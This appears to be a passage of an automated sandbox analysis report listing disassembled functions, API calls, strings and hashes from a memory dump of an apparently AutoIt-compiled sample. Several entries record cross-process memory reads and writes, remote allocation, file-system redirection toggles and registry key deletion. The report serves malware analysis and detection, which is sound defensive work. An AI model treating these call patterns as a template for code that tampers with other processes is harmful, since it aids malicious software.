\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00632D66

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: ef1172ced7ab44b38d83cfb476ba6ed32e2f611e8d39f1c675512a9fde47b946
Instruction ID: e1d54794457ec5b8ebf77c732e90c5e5333e5702d96be1a70455fea073b1b871
Opcode Fuzzy Hash: ef1172ced7ab44b38d83cfb476ba6ed32e2f611e8d39f1c675512a9fde47b946
Instruction Fuzzy Hash: 43918D71508712DFC754EF24E896CAFB7A6EF85710F00491DF4469B2A1DA30ED44CB96

Function 0068B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00624750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00624743,?,?,006237AE,?), ref: 00624770

CoInitialize.OLE32(00000000), ref: 0068B9BB
CoCreateInstance.OLE32(006B2D6C,00000000,00000001,006B2BDC,?), ref: 0068B9D4
CoUninitialize.OLE32 ref: 0068B9F1

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

Strings

.lnk, xrefs: 0068B99D, 0068B9AB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 6b7285b9190b235569051f7bdea78d9005ac1e94788af525049776c902551152
Instruction ID: 8012b1abf3af93002acfed5df4fb08d42e2aa9f46cd9da3b06020a8f2ec096e3
Opcode Fuzzy Hash: 6b7285b9190b235569051f7bdea78d9005ac1e94788af525049776c902551152
Instruction Fuzzy Hash: 1DA134756042119FCB14EF24C484DAABBE6FF89314F048A98F8999B3A1CB31EC45CF95

Function 0067B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0067B4BE

Strings

Container, xrefs: 0067B43B
%k, xrefs: 0067B561
AutoIt3GUI, xrefs: 0067B436

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%k
API String ID: 3565006973-671182982
Opcode ID: 7460a60baf9b8ba7e89568771e8744053f134c90260993869aac3b32ae205314
Instruction ID: 91b73067303b749bf46e30074595dcf8d0516671e3735a10f17fd066f61b52a1
Opcode Fuzzy Hash: 7460a60baf9b8ba7e89568771e8744053f134c90260993869aac3b32ae205314
Instruction Fuzzy Hash: 2E912770600601AFDB54DF64C884BAABBE6FF49710F24956EF94ACB391EB70E841CB50

Function 0064501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006450AD

Part of subcall function 006500F0: __87except.LIBCMT ref: 0065012B

Strings

pow, xrefs: 00645085, 006450A2

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: af35742741766342d7d8122a32e0826b821d263576cf4ebc98d3ffef1ceef4d0
Instruction ID: b8d7f6e709ce0a9dc94144123ae07e389192d0d4cd78d31cdcd1bb27cb3e4be8
Opcode Fuzzy Hash: af35742741766342d7d8122a32e0826b821d263576cf4ebc98d3ffef1ceef4d0
Instruction Fuzzy Hash: 86515D75908A0297EB217B54C9053BE2F979B40B01F208D5DE8D6863DBDF34CDDC9A8A

Function 00668584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0066862B
_memmove.LIBCMT ref: 00668685

Strings

_c, xrefs: 006686FF, 0066DFDC, 0066DFF8
3cc, xrefs: 0066860C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove
String ID: 3cc$_c
API String ID: 4104443479-1111051329
Opcode ID: 8689979f688c1ab7e55c1c92174f0b5a830def68ff64e7efe7dc8a04b63bada3
Instruction ID: 8b7d8a7832e223deb37fd52d4002774bc2946dc050dab0252a858b1a8c287ebf
Opcode Fuzzy Hash: 8689979f688c1ab7e55c1c92174f0b5a830def68ff64e7efe7dc8a04b63bada3
Instruction Fuzzy Hash: 2F510C70A006199FCF64CF68D884AEEBBF2FF45304F148529E85AD7350EB31A965CB91

Function 006797F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00679296,?,?,00000034,00000800,?,00000034), ref: 006814E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0067983F

Part of subcall function 00681487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006814B1

Part of subcall function 006813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00681409
Part of subcall function 006813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0067925A,00000034,?,?,00001004,00000000,00000000), ref: 00681419
Part of subcall function 006813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0067925A,00000034,?,?,00001004,00000000,00000000), ref: 0068142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006798AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006798F9

Strings

@, xrefs: 00679911

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 9debe2b5ebc02f3fc8b13d94da278a20c7c273bfedf818607d17c53d40f65470
Instruction ID: 74d538b789b533fb9ac2ea13be93a61c661b58a4ba89e2466f404a97af07d54e
Opcode Fuzzy Hash: 9debe2b5ebc02f3fc8b13d94da278a20c7c273bfedf818607d17c53d40f65470
Instruction Fuzzy Hash: 0341427690021CBFDB10EFA4CC41EDEBBB9EB0A300F144159FA59B7251DA716E45CBA1

Function 006A7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006AF910,00000000,?,?,?,?), ref: 006A79DF
GetWindowLongW.USER32 ref: 006A79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 006A7A0C

Strings

SysTreeView32, xrefs: 006A79B1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 8cd5c52e8d9dfd5365869d33fa19a80d0e5fe0040150fdee57f79304db18fa5d
Instruction ID: b10cca1d2d710061794089b1f6cbd3d8ae05f48b4cf7a47d820729477f319cd5
Opcode Fuzzy Hash: 8cd5c52e8d9dfd5365869d33fa19a80d0e5fe0040150fdee57f79304db18fa5d
Instruction Fuzzy Hash: AE31AE31204606AFDB51AF78DC41BEB77AAEB0A324F208725F975922E0D731ED519F60

Function 006A73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006A7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006A7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 006A7499

Strings

SysMonthCal32, xrefs: 006A742C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 51f87788b3c3d8f18ce3d4d3b7b595b12421ebadfb6ab1582f9c718796d1c31c
Instruction ID: 39799aa1993a080f8f2941810a67f789fd79860a452ff0c6bd82d249e2ed2324
Opcode Fuzzy Hash: 51f87788b3c3d8f18ce3d4d3b7b595b12421ebadfb6ab1582f9c718796d1c31c
Instruction Fuzzy Hash: A4219F32500218ABDF119FA4CC46FEA3BAAEF4D724F110214FE156B191DAB5AC519FA0

Function 006A7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006A7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006A7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006A7C5F

Strings

msctls_updown32, xrefs: 006A7BC4

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 10bbc9b02a774ede74df30a68fdd871a9f6d4e1bebf0b93f9dc0c00d308ba61f
Instruction ID: 58c8c4e31d5b81955c558e228919e2717a4e69f9e71312023056243a77bbf237
Opcode Fuzzy Hash: 10bbc9b02a774ede74df30a68fdd871a9f6d4e1bebf0b93f9dc0c00d308ba61f
Instruction Fuzzy Hash: D1217CB5604218AFDB10EF24DCC1CA737EEEF5A364B141059F9029B3A1CB31EC118EA0

Function 006A6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006A6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006A6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006A6D70

Strings

Listbox, xrefs: 006A6D08

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 7d1a8673d30ffb19c72868e481a02297c40b84eb9bb9bb22687ae96e88b39089
Instruction ID: 1ebe38020692025563dd77d3fd4a93dfd239c47ed63d40c288d81a6a1669d17d
Opcode Fuzzy Hash: 7d1a8673d30ffb19c72868e481a02297c40b84eb9bb9bb22687ae96e88b39089
Instruction Fuzzy Hash: FA218332610118BFDF11AF54DC45EEB37ABEF8A760F058128FA455B290C671AC518BA0

Function 006939E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00693A66

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Strings

%k, xrefs: 006939F4
, $, xrefs: 00693AA6
AUTOITCALLVARIABLE%d, xrefs: 00693A58

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%k
API String ID: 3506404897-183977080
Opcode ID: 7e9ce061c5bfb1a144196289d3961354e9efe2805732613f5df3782d0b42fdc0
Instruction ID: 648e05edac7fb7c855b711f41fca758933cd9c10c53540ef7ee203b2ce78b79b
Opcode Fuzzy Hash: 7e9ce061c5bfb1a144196289d3961354e9efe2805732613f5df3782d0b42fdc0
Instruction Fuzzy Hash: 75216F31B00629AFCF50EF64DC86EAE77BBAF44700F504459F855A7281DB30EA45CB69

Function 006A770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006A7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006A7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006A7794

Strings

msctls_trackbar32, xrefs: 006A7749

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 2eac809a4bb4e9711ec457c540ba9ade390ba623a6cff79bffa2290061df9a2a
Instruction ID: e1a2a421de62b1ed98a20cbb2e2d54dd83e45f7534526b0de38fca24311816ab
Opcode Fuzzy Hash: 2eac809a4bb4e9711ec457c540ba9ade390ba623a6cff79bffa2290061df9a2a
Instruction Fuzzy Hash: C8112732204208BAEF106F60CC01FD7376AEF8AB54F010118F64196190C271E811CF20

Function 00646B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00646B93
__calloc_crt.LIBCMT ref: 00646BAC

Strings

m, xrefs: 00646BD1
@Bn, xrefs: 00646BC3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __calloc_crt
String ID: m$@Bn
API String ID: 3494438863-407697839
Opcode ID: 2bac49a26824f49a21c591fb34df17cca9517ec1bbbc20738eabf70e735d4f8c
Instruction ID: b5c26763a97d82a08d7420d8fc65d5e79d5ae1cf23342808aa4a55e7e1113240
Opcode Fuzzy Hash: 2bac49a26824f49a21c591fb34df17cca9517ec1bbbc20738eabf70e735d4f8c
Instruction Fuzzy Hash: AAF04F71608B128FF7649F68FC91BA62B97E712734B50041EF302CF290EB70899286C5

Function 00649B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00649B94

Part of subcall function 00649C0B: __mtinitlocknum.LIBCMT ref: 00649C1D
Part of subcall function 00649C0B: EnterCriticalSection.KERNEL32(00000000,?,00649A7C,0000000D), ref: 00649C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00649BA4

Part of subcall function 00649100: ___addlocaleref.LIBCMT ref: 0064911C
Part of subcall function 00649100: ___removelocaleref.LIBCMT ref: 00649127
Part of subcall function 00649100: ___freetlocinfo.LIBCMT ref: 0064913B

Strings

8m, xrefs: 00649B85
8m, xrefs: 00649B8A, 00649B9F, 00649BAB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8m$8m
API String ID: 547918592-546454882
Opcode ID: d0f01708a01fd9f1ed2cb9b18a4695271466f3c783f8fa4a2dc2e6c4ff3aa2c1
Instruction ID: 3ca659ab0a52c5837eeb4808696ba5e3bb0f32a0a9275284400da71453b6d68f
Opcode Fuzzy Hash: d0f01708a01fd9f1ed2cb9b18a4695271466f3c783f8fa4a2dc2e6c4ff3aa2c1
Instruction Fuzzy Hash: 44E08C71D87700ABEB90BBE86A43B4E27639B02B21F20115FF0555A2C1CD712400862F

Function 00624C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00624B83,?), ref: 00624C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00624C56

Strings

kernel32.dll, xrefs: 00624C3F
Wow64RevertWow64FsRedirection, xrefs: 00624C50

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: fbd1a57fa81e45ea50eab36ba99d0203b6f72f6e1daead63f9cfadd56868c2f5
Instruction ID: b67f423497baa22614ab6341aa11c53319ea4d6ac756e9c71429a4c6a8d62fe0
Opcode Fuzzy Hash: fbd1a57fa81e45ea50eab36ba99d0203b6f72f6e1daead63f9cfadd56868c2f5
Instruction Fuzzy Hash: 63D01230610B23CFD7206F75E94864676E6AF06351B11883AD496D6660EA70D880CE61

Function 00624C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00624BD0,?,00624DEF,?,006E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00624C23

Strings

kernel32.dll, xrefs: 00624C0C
Wow64DisableWow64FsRedirection, xrefs: 00624C1D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: c578d1042b4b531d5317f2085edc9d2f4a84117ffd69e764d4a63e9f47f3c86a
Instruction ID: 20afe82517c89e8a5c539c8ec0e7f75461a86213d4150b17c9d65287c5b469e2
Opcode Fuzzy Hash: c578d1042b4b531d5317f2085edc9d2f4a84117ffd69e764d4a63e9f47f3c86a
Instruction Fuzzy Hash: D9D01230611B23CFD720BFB5ED48646B6E7EF0A352B119C3AD486D6650EEB0D880CE61

Function 006A0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,006A1039), ref: 006A0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006A0E07

Strings

RegDeleteKeyExW, xrefs: 006A0E01
advapi32.dll, xrefs: 006A0DF0

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 792533915ee5311a309a71c713454e366eff0c75d678997ff467a545a6c5fecf
Instruction ID: 98383bbe290750b49767fd91d811d0eb7d8baf20ca03239dd4ac6f1a9b357e75
Opcode Fuzzy Hash: 792533915ee5311a309a71c713454e366eff0c75d678997ff467a545a6c5fecf
Instruction Fuzzy Hash: F7D01770950722CFE720AFB5D84868676E7AF16352F129C7ED486D2250EAB0EC90CE61

Function 006990E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

